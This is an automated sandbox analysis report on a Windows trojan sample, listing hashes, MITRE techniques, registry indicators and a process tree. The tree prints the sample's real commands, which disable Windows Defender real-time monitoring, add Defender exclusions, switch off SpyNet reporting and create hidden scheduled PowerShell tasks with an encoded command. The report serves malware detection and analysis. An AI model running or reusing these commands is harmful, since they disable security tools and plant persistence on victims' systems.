70ce3587b46a2b75b84116bdc5ee09d2b53ae6edaf7380b8a2855af3e0ca1146

Analysis

max time kernel
141s
max time network
149s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 10:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

905062d7e4374f14a079554a72dd4540
SHA1

3e086d67c4eb46be9a4fc51abadb20718e0f4544
SHA256

70ce3587b46a2b75b84116bdc5ee09d2b53ae6edaf7380b8a2855af3e0ca1146
SHA512

ca3bc58c214c4f1e814b51524fcaccfb6583ef9e4ea9b579bf433718847932b09fdd3b386ed72bf144f44f31b633cc4376f473342b127d0d4b03cc31b6549bc4
SSDEEP

196608:91Ov0/6nlN9HgqeaGNEsg0eIHAIDVBszR6XLMsIR5B:3OvC6nTmqeajsdgIVBsVf

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

conhost.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exeschtasks.exereg.exereg.execonhost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gUXCkMfuWzCyC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\QtEKgGNERTHTknVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gcyASImYjZBU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vCYWhmhlU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yqOJJFIvHNUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gcyASImYjZBU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vCYWhmhlU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yqOJJFIvHNUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gUXCkMfuWzCyC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\QtEKgGNERTHTknVB = "0"	reg.exe

Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exesUNrhMS.exe

pid process

1124 Install.exe
2036 Install.exe
1792 sUNrhMS.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Loads dropped DLL 8 IoCs

Processes:

file.exeInstall.exeInstall.exe

pid process

1632 file.exe
1124 Install.exe
1124 Install.exe
1124 Install.exe
1124 Install.exe
2036 Install.exe
2036 Install.exe
2036 Install.exe

pid	process
1124	Install.exe
2036	Install.exe
1792	sUNrhMS.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
1632	file.exe
1124	Install.exe
1124	Install.exe
1124	Install.exe
1124	Install.exe
2036	Install.exe
2036	Install.exe
2036	Install.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.EXEsUNrhMS.exepowershell.EXEpowershell.EXEpowershell.EXEInstall.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	sUNrhMS.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	sUNrhMS.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	sUNrhMS.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

284 schtasks.exe
1064 schtasks.exe
1132 schtasks.exe
1348 schtasks.exe
1100 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job	schtasks.exe

pid	process
284	schtasks.exe
1064	schtasks.exe
1132	schtasks.exe
1348	schtasks.exe
1100	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

pid	process
1520	powershell.EXE
1520	powershell.EXE
1520	powershell.EXE
1724	powershell.EXE
1724	powershell.EXE
1724	powershell.EXE
1308	powershell.EXE
1308	powershell.EXE
1308	powershell.EXE
1940	powershell.EXE
1940	powershell.EXE
1940	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1520	powershell.EXE
Token: SeDebugPrivilege	1724	powershell.EXE
Token: SeDebugPrivilege	1308	powershell.EXE
Token: SeDebugPrivilege	1940	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1632 wrote to memory of 1124	1632	file.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 1124 wrote to memory of 2036	1124	Install.exe	Install.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 888	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 2036 wrote to memory of 1612	2036	Install.exe	forfiles.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 1612 wrote to memory of 1348	1612	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 888 wrote to memory of 1792	888	forfiles.exe	cmd.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 796	1792	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 948	1348	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1792 wrote to memory of 1512	1792	cmd.exe	reg.exe
PID 1348 wrote to memory of 1576	1348	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632

C:\Users\Admin\AppData\Local\Temp\7zSF835.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124

C:\Users\Admin\AppData\Local\Temp\7zSFCE6.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1792

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:796

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1512

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1348

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:948

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1576

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gjpzVDTEG" /SC once /ST 01:36:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:284

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gjpzVDTEG"
4⤵
PID:1684

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gjpzVDTEG"
4⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1016

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 10:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\sUNrhMS.exe\" mF /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1064

C:\Windows\system32\taskeng.exe
taskeng.exe {D6181D66-DEBB-42F2-9D85-0A4CEABBA87D} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1132

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1580

C:\Windows\system32\taskeng.exe
taskeng.exe {FC5B24E7-77B7-44B8-BEDD-0E17FA051D3F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\sUNrhMS.exe
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\sUNrhMS.exe mF /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1792

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggKLmVxuu" /SC once /ST 00:43:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1132

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggKLmVxuu"
3⤵
PID:276

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggKLmVxuu"
3⤵
PID:680

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1628

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:884

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "guTjTwcUQ" /SC once /ST 07:18:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1348

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "guTjTwcUQ"
3⤵
PID:1940

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1472

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "guTjTwcUQ"
3⤵
PID:1376

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1344

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1624

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1724

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1588

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:956

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:944

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1776

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\LzrOtnkAyuDpOCzW\sCNWMmDv\UHcRSqiBHCdWrwRD.wsf"
3⤵
